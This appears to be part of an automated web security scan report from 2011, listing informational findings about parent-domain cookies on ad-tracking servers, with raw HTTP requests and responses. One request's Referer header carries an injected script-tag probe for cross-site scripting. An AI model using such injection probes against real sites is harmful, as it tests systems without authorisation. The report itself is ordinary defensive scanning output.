bkc=KJh56qXvxUWDOdeFhUe51agGjAe8+0o1cLOrDavbKxveiVHCRSW1ULYiqeSE+fOQDBJN5zFG2Tr4b8pk7eb5zp35pLR9e7LQbfQNezOsK1Zzua/l9ofUy+L+Rwb813vVdz3jWeOrSgQ2wc5iNOSp7a5riqYS9Y4qg4ZIk7PkwxQzh4fzd51FwKCu287kFwnze6EmsFnhbXXszXsA4kGQ5oQ4pn60+zfXvkcqpO4ZVjab0ipFDybv4IyVxwEwfuaN+DX+Lf/jOrGoM4iVo7V8EdABcqObC9==; expires=Sat, 10-Dec-2011 11:19:06 GMT; path=/; domain=.bluekai.com
bko=KJhMWsHQ6wg6NjKHxjVUQDac83VF9115v/ra/DT/yZJiu/uvLEnG1E1y1n2TfLFsA1XmREW0KwwYVmoxaQ5egYYWhzxyixlYTZ/T0Xl9Xwl8zN2ZCGkxaiBe9QXex20Ej69hnEMgWMIWhziQyy+Mu4/h1nynFQVDkxV09MjKOfGw9sOC1SR=; expires=Sat, 10-Dec-2011 11:19:06 GMT; path=/; domain=.bluekai.com
bkw5=KJhE+VOQzmvz0Sesh1e9y8eFhze9yMYBIR1k98eX9uR8gWYAgCyMQ0jDqHyM9T1Rx0kxnH1eJ85M9ymxEskZRWQs3Zx907XO0QLybBLp1e9Y5U81RtO/HjnCjpYW07yY0rxi049hmWakxcRV/1A/1AHYjETe2Hxi0RQyCWBkxsbrxj/Hj4Y90GeX6Kf9yJ9Z1j1CCxWA2+/O/F1DvewPauMWLJCCehw/wtvIYO5yK99hp60ypcX4iBXMQshrCGzI/OvicN+GPRaJA1XCFGuTshvv68i87GO/wi9J9J8DHkA=; expires=Sat, 10-Dec-2011 11:19:06 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2736 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bkst=KJh5Aean96WxCqz/vYShDVyDLqO5lBljljL+xyycAPmYQAk8+lLcvAx+RLeY0+8SgVNLHs+O0Y2//8SVSr5wzmfum5UylFeBpvrhNyPsBU78usgLM4okNG38ZJDW5sexscNdBuPdxFTZy0/pmSuK/bE9+4zoh8OswYoDg7B7gDSF7AFKkmq7tsCT1My5etXghY2Juy0NLySWOSz1vsBxt1cBJ2kJFqHOV0s1AaRbOSCOuM7ddDUt5q6Xx/zQGLyMpNtDzu7Hzyi88Nssl7MYW73gKriO8k5jr2UjfIyKfB7+yNffwnT1TfmTXwchEZM5PPrqM5kVJqx6uCLkbexxScGPjqlJV/wCCEXS2qoJF2X5gvp2Aw8mIQSEYisn7vv6CvEx1oWsvEpJlCjvtIjE0UCzdO4acfhCRY9=; bko=KJpERtjQRcfhlJKB/jX5yZJAXmSaL5uCn9TsPuOnHISkgyOegYOWM/7Ceku1CVWus6u1iIWLBywe2I4w4jAjJAJjM9yJw9y1zDIK9zV6TvhndO9V/T1mnTyPJyxhMTACWVG0vT1AcywerIOqxOt0xaq9hr+9tyYUlYXt; bkw5=KJh+AnAmQDWDHLIwyCjnQ3C6J9GHcHonJ4nlSeuVEkOGHYaHK9wJd08KHAvCLhDbfoQooke10VEmFj7flUyPtiswQQIipnLxTmYdNHYI4ypVaDL8CbvocE3xRuVNwAnCNCqCK9zM3DEXul0YzQ1zbqhwRVvjmOPMcZJZkG7HBAq2rqO1AGWhEIkjVijaphQNXXR0SEgs3OpfJA0pcZwDtfVopDP1LY17b7sDeUhz7q9F2yQ7PNaUd5FJIAKPEt4H6Ik5c4pCLtJ1I9VDi6n5; bklc=4df5ee2b; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101UfXTSLFDJvOkuWF1ETpHRqO01ex61eD6BEx6LMzy1n10Be/p9H/saGSVCi9a919PW6uv9==; bk=rWc5iq9yk+ud8JkA; bkc=KJhqpzU9LcAp9TwzobIIM9y1evrO4m+VPcT1YTvF0zw96OUw0weZ/Tv4/RlvE6wMQdEeI/k9RkTl9XwMeN22ZSOXAe01pXcJyc9wSndtmTCbWnIheJU4Q1RcbR4hopWp1w92RVExAUAJ8lmCXUUkDwZ46hCxIJdxIOdHIaPV3cymBwTwuNEIOpEIDpEIHeBDdQx6wLCd1eT71e8tEV5QWWwiopuMXC6qDwAQsLSUTtPQiaOkHmsdDDmPO2AcTy19WS83Zx==; bkdc=res

Response

HTTP/1.1 302 Found
Date: Mon, 13 Jun 2011 11:19:06 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Location: http://pix04.revsci.net/G07610/b3/0/3/noscript.gif?D=DM_LOC%3Dhttp%253A%252F%252Fbluekai.com%253FBK_EVT%253DMM_EXNF
Set-Cookie: bk=v7chM9kKkhsd8JkA; expires=Sat, 10-Dec-2011 11:19:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56qXvxUWDOdeFhUe51agGjAe8+0o1cLOrDavbKxveiVHCRSW1ULYiqeSE+fOQDBJN5zFG2Tr4b8pk7eb5zp35pLR9e7LQbfQNezOsK1Zzua/l9ofUy+L+Rwb813vVdz3jWeOrSgQ2wc5iNOSp7a5riqYS9Y4qg4ZIk7PkwxQzh4fzd51FwKCu287kFwnze6EmsFnhbXXszXsA4kGQ5oQ4pn60+zfXvkcqpO4ZVjab0ipFDybv4IyVxwEwfuaN+DX+Lf/jOrGoM4iVo7V8EdABcqObC9==; expires=Sat, 10-Dec-2011 11:19:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJhMWsHQ6wg6NjKHxjVUQDac83VF9115v/ra/DT/yZJiu/uvLEnG1E1y1n2TfLFsA1XmREW0KwwYVmoxaQ5egYYWhzxyixlYTZ/T0Xl9Xwl8zN2ZCGkxaiBe9QXex20Ej69hnEMgWMIWhziQyy+Mu4/h1nynFQVDkxV09MjKOfGw9sOC1SR=; expires=Sat, 10-Dec-2011 11:19:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhE+VOQzmvz0Sesh1e9y8eFhze9yMYBIR1k98eX9uR8gWYAgCyMQ0jDqHyM9T1Rx0kxnH1eJ85M9ymxEskZRWQs3Zx907XO0QLybBLp1e9Y5U81RtO/HjnCjpYW07yY0rxi049hmWakxcRV/1A/1AHYjETe2Hxi0RQyCWBkxsbrxj/Hj4Y90GeX6Kf9yJ9Z1j1CCxWA2+/O/F1DvewPauMWLJCCehw/wtvIYO5yK99hp60ypcX4iBXMQshrCGzI/OvicN+GPRaJA1XCFGuTshvv68i87GO/wi9J9J8DHkA=; expires=Sat, 10-Dec-2011 11:19:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 14-Jun-2011 11:19:06 GMT; path=/; domain=.bluekai.com
BK-Server: a96f
Content-Length: 0
Content-Type: text/html

12.140. http://tags.bluekai.com/site/3113 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/3113

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bklc=4df5f41e; expires=Wed, 15-Jun-2011 11:27:26 GMT; path=/; domain=.bluekai.com
bk=gJEI1xqRtYLBvF/1; expires=Sat, 10-Dec-2011 11:27:26 GMT; path=/; domain=.bluekai.com
bkc=KJh56q2nxkWDOdeF2xU84wGwvWoewlOGM4HOTmeT/LuC/RQQG3PdGWAyCpEYk+gS7//Vjy7KWBcRf+RFvzJOyuUG7O5cf77eFjzw2lFwmUYnSSY2qNYRE91eGWQIpZA4hq0lQn7wwsetSkOg4Ll2LSi2EzLtFh54mXOosEMJMy/c4GG2nZZdhU0NG5tBZKrnh07QQrj8VCoad5Mma1Gf7MSdad4Ggoy6KnuXsEw7hRD1Ln+izsd8KhUv7Oz46cqq9S3kE8gUHmjfzDMpoWmQxKRXKXFE8gpTM+pF9lUn4ArqXI/cLAFN4zFwb23zaddudyXFeKGdf6WYqrELZFqnL7qkc1oH4fJe537ITmq4UJ22tBurBnE8awXOeYbP99==; expires=Sat, 10-Dec-2011 11:27:26 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3113 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
Cookie: bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bk=C02T2xqRtYLBvF/1; bkc=KJh5pg2nxkWDOdeFfxUN4wRwO/SewbqVuOX/eG6FHOyzU9HUdyW7xHLiiPo3StLuVoyMzJOG5c4pJTVTOYtY8py851XqfgNXmB2fprkbyBdDGBp8eQ09n7khocNBhlq+XB2we+ev9XlWv7eQh2iq7wRLTLznfRK/rq2TWyBb+127zCUmRprdDY88tFh4dW3NdncO0wJkhJyU7869NqEOZIV4eJx8nbfE2U/cUmVV+vXJpUUhAwSJeTWtZ4wLQ34BKUs4wOQ9azFIMEq7hH2Akdgfkgdm+EAFlLSO0qNOjE6werYswLN3MNwShPLGCdwJe+ZkdrdwKlBd53mMUVhgX0FK9D/ui/Q=; bko=KJ0fyXF9TB4XtoKJxHU/m3qy6oKHRH/qH/0P/HWGkiLnWGLEQgaAIHQRx+T29I3xCn/RsxO6QCsJ; bkw5=KJpfoXU9y19NZIW4/y1es6mYsy1e/y17N2foe9pl+/W0DM1jr/9DnX1zxTx1rp8YCGdO6xxCGtgOymeWmj+OMRZOQjDClyLA1Tl8Q0DeQ0jDJQ8Ge05evPYsYSMcLxc/T6ooOLoq9xNMZ1ayQQsACya1drVHDZ5Av9EJz18AI9/DjZR/+6KRbVVn61mWGLzBgsGsP9hjo+tOQuaBRijeYkMLoxwW+v596f88QWJiJL1a5oOoMBT/UyA9txpzLXW0p9p1uend4DYIZLAxyxuuKKQe/isZxPyTMqAvbcG9AMDt89==; bkst=KJykMqNvx6WxCSz/Yw8DtQkiRELyLpmqlzU3A3HxDwOvO1+T5tIH70r//SxE2aPL4xUOxih2e1DZM8eN8oE4IEi79Idq995xaWiqzOOt8BVT6dOp6RswlJI9uNhgB/xMU0L3HzWxFzBrPH+PiuARKZg2fIhFyq0jBwKn8Fn8nbBPHFLQNGAwhBTcuXhOMUy5dIqbjK4dxVBahoiWAiosWqSR8RiC+7KibZCAoVp7UgBdYnNize6TNbgFj7yk0TKpKPZmoKMtKdgjpCf+9KhYrCPZrhpKnvSwq8ZF9xwKwJW=; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101x8L4r6n9W5cOkz=

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:27:26 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4df5f41e; expires=Wed, 15-Jun-2011 11:27:26 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=gJEI1xqRtYLBvF/1; expires=Sat, 10-Dec-2011 11:27:26 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56q2nxkWDOdeF2xU84wGwvWoewlOGM4HOTmeT/LuC/RQQG3PdGWAyCpEYk+gS7//Vjy7KWBcRf+RFvzJOyuUG7O5cf77eFjzw2lFwmUYnSSY2qNYRE91eGWQIpZA4hq0lQn7wwsetSkOg4Ll2LSi2EzLtFh54mXOosEMJMy/c4GG2nZZdhU0NG5tBZKrnh07QQrj8VCoad5Mma1Gf7MSdad4Ggoy6KnuXsEw7hRD1Ln+izsd8KhUv7Oz46cqq9S3kE8gUHmjfzDMpoWmQxKRXKXFE8gpTM+pF9lUn4ArqXI/cLAFN4zFwb23zaddudyXFeKGdf6WYqrELZFqnL7qkc1oH4fJe537ITmq4UJ22tBurBnE8awXOeYbP99==; expires=Sat, 10-Dec-2011 11:27:26 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 14-Jun-2011 11:27:26 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 14 Jun 2011 11:27:26 GMT
Cache-Control: max-age=86400, private
BK-Server: c53d
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

12.141. http://tags.bluekai.com/site/353 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/353

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=s9pWoq9yk+ud8JkA; expires=Sat, 10-Dec-2011 11:13:39 GMT; path=/; domain=.bluekai.com
bkc=KJhnjsHQZB4ByweTyN54/J1CWDMWLYeTcJy1ew5SsHi6l0cTMVVGd9R6wAQdMeIBZRsOfyAMQTf1upi4YTtFvT4vd8psQ1ndC1qdi1SFLAnkzbeh4NiiXMIQXjIiXuKSG4/7GwaOdGwhmqARscjBjt9xxIv7Bvw0cH+xIu9Sho4MjVY/DsPWTq2Hx8Dctx4M9ye+9D2P; expires=Sat, 10-Dec-2011 11:13:39 GMT; path=/; domain=.bluekai.com
bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101UfXTSLFDJvOkuWF1ETpHRqO01ex61eD6BEx6LMzy1n10Be/p9H/saGSVCi9a919PW6uv9==; expires=Sat, 10-Dec-2011 11:13:39 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/353?rand=0.15050748130306602 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101HSEKKAnksHQjzCnM121AVWy1M96Be9NBeV6Be/lLe9p1Mx01yWuCoSsaQRQhxe2Hxfm; bkst=KJh5Aean96WxCqz/vYShDVyDLqO5lBljljL+xyycAPmYQAk8+lLcvAx+RLeY0+8SgVNLHs+O0Y2//8SVSr5wzmfum5UylFeBpvrhNyPsBU78usgLM4okNG38ZJDW5sexscNdBuPdxFTZy0/pmSuK/bE9+4zoh8OswYoDg7B7gDSF7AFKkmq7tsCT1My5etXghY2Juy0NLySWOSz1vsBxt1cBJ2kJFqHOV0s1AaRbOSCOuM7ddDUt5q6Xx/zQGLyMpNtDzu7Hzyi88Nssl7MYW73gKriO8k5jr2UjfIyKfB7+yNffwnT1TfmTXwchEZM5PPrqM5kVJqx6uCLkbexxScGPjqlJV/wCCEXS2qoJF2X5gvp2Aw8mIQSEYisn7vv6CvEx1oWsvEpJlCjvtIjE0UCzdO4acfhCRY9=; bko=KJpERtjQRcfhlJKB/jX5yZJAXmSaL5uCn9TsPuOnHISkgyOegYOWM/7Ceku1CVWus6u1iIWLBywe2I4w4jAjJAJjM9yJw9y1zDIK9zV6TvhndO9V/T1mnTyPJyxhMTACWVG0vT1AcywerIOqxOt0xaq9hr+9tyYUlYXt; bkw5=KJh+AnAmQDWDHLIwyCjnQ3C6J9GHcHonJ4nlSeuVEkOGHYaHK9wJd08KHAvCLhDbfoQooke10VEmFj7flUyPtiswQQIipnLxTmYdNHYI4ypVaDL8CbvocE3xRuVNwAnCNCqCK9zM3DEXul0YzQ1zbqhwRVvjmOPMcZJZkG7HBAq2rqO1AGWhEIkjVijaphQNXXR0SEgs3OpfJA0pcZwDtfVopDP1LY17b7sDeUhz7q9F2yQ7PNaUd5FJIAKPEt4H6Ik5c4pCLtJ1I9VDi6n5; bklc=4df5ee2b; bk=ePFVBn9yk+ud8JkA; bkc=KJpMTsHQrB4vyve2f3LF/y1e9yKxlNis0Z29TXKy/wMEZOARIJTy1rM/F/Epr5eTr7vGd12oeYMXEtMXMtMXvi+DwQzSdTzkvFXesFXos7Iisuod9CG48eXR78mnQVcU59Rs1uHIuM13lfWOkxIiRUy8UQSsYaPsawTqBPH8Ac6ywQ95eDqz; bkdc=res

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:13:39 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 14 Jun 2011 11:13:39 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=s9pWoq9yk+ud8JkA; expires=Sat, 10-Dec-2011 11:13:39 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhnjsHQZB4ByweTyN54/J1CWDMWLYeTcJy1ew5SsHi6l0cTMVVGd9R6wAQdMeIBZRsOfyAMQTf1upi4YTtFvT4vd8psQ1ndC1qdi1SFLAnkzbeh4NiiXMIQXjIiXuKSG4/7GwaOdGwhmqARscjBjt9xxIv7Bvw0cH+xIu9Sho4MjVY/DsPWTq2Hx8Dctx4M9ye+9D2P; expires=Sat, 10-Dec-2011 11:13:39 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101UfXTSLFDJvOkuWF1ETpHRqO01ex61eD6BEx6LMzy1n10Be/p9H/saGSVCi9a919PW6uv9==; expires=Sat, 10-Dec-2011 11:13:39 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 14-Jun-2011 11:13:39 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

12.142. http://tap.rubiconproject.com/oz/feeds/targus/profile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cd=false; Domain=.rubiconproject.com; Expires=Tue, 12-Jun-2012 11:21:43 GMT; Path=/
lm="13 Jun 2011 11:21:43 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/targus/profile?p=targus&oz_source=partner&segment=000&zip=&dob=&gender=&pc= HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; lm="21 May 2011 12:38:06 GMT"; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_1197=3460050161923843111; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13464^1; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; rdk=5941/13464; rdk2=0; ses2=13464^2; rpb=3580%3D1%264222%3D1%266811%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1; cd=false; dq=7|3|4|0

Response

HTTP/1.1 204 No Content
Date: Mon, 13 Jun 2011 11:21:43 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 12-Jun-2012 11:21:43 GMT; Path=/
Set-Cookie: dq=10|5|5|0; Expires=Tue, 12-Jun-2012 11:21:43 GMT; Path=/
Set-Cookie: xdp_ti="13 Jun 2011 11:21:43 GMT"; Version=1; Max-Age=604800; Path=/
Set-Cookie: lm="13 Jun 2011 11:21:43 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

12.143. http://tap.rubiconproject.com/oz/sensor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

cd=false; Domain=.rubiconproject.com; Expires=Tue, 12-Jun-2012 11:22:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oz/sensor?p=rubicon&pc=5941/13464&cd=false&xt=20&k=hours+ago:176,6+hours:152,continue+reading:120,6+hour:76,eastern+atlantic:64,new+york:64,eastern+southeast:64,western+northwest:64,western+southwest:64,western+pacific:64,eastern+central:64,western:48,smoking+cuban:48,eastern:48,hours:44,fansided:40,unprecedented+daily:40,news+coverage:40,blog+network:40,daily+sports:40,sports+fans:40,sports+news:40,one+blog:40,come+check:40,number+one:40,royal+pain:40,can+heat:40,game+6:40,u+can:40,favorite:40,retweet:40,2011:34,written:32,jimmer+fredette:32,pippen+ain't:32,mark+cuban:32,mock+draft:32,ain't+easy:32,nugg+love:32,hardwood+houdini:32,&rd=sportdfw.com&t=NBA+|+FanSided HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_1197=3460050161923843111; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; ses2=13464^3; rpb=3580%3D1%264222%3D1%266811%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%262373%3D1%263810%3D1%262374%3D1%265720%3D1; cd=false; dq=9|4|5|0; rdk=5941/13464; rdk9=0; ses9=13464^3

Response

HTTP/1.1 204 No Content
Date: Mon, 13 Jun 2011 11:22:16 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 12-Jun-2012 11:22:16 GMT; Path=/
Set-Cookie: dq=10|4|6|0; Expires=Tue, 12-Jun-2012 11:22:16 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

12.144. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/partner/agent/rubicon/channels.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

khaos=GOVBRMNC-I-DXQD; Domain=.rubiconproject.com; Expires=Tue, 11-Jun-2019 11:21:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded&pc=5941/13464 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; lm="21 May 2011 12:38:06 GMT"; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; cd=false; dq=6|3|3|0; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_1197=3460050161923843111; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13464^1; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; rdk=5941/13464; rdk2=0; ses2=13464^2; rpb=3580%3D1%264222%3D1%266811%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:41 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 584
Cache-control: private
Set-Cookie: khaos=GOVBRMNC-I-DXQD; Domain=.rubiconproject.com; Expires=Tue, 11-Jun-2019 11:21:41 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close

var oo_profile={
tokenType : "0",
tracking : "",
tags : "Democrats",
tagcloud : [
{ tag: "Democrats", weight: 70}
],
pixels : [
{ url: "http://pixel.rubiconproject.com/di.php?
...[SNIP]...

12.145. http://tiger.vizu.com/a.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tiger.vizu.com
Path:	/a.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ptc=1879%3D728x90-2;Path=/;Domain=.vizu.com;Expires=Wed, 13 Jul 2011 11:25:59 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a.gif?cid=1879&adid=728x90&siteid=bbe&ord=1307963953 HTTP/1.1
Host: tiger.vizu.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/?l=844620&sz=728x90&wr=h&t=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
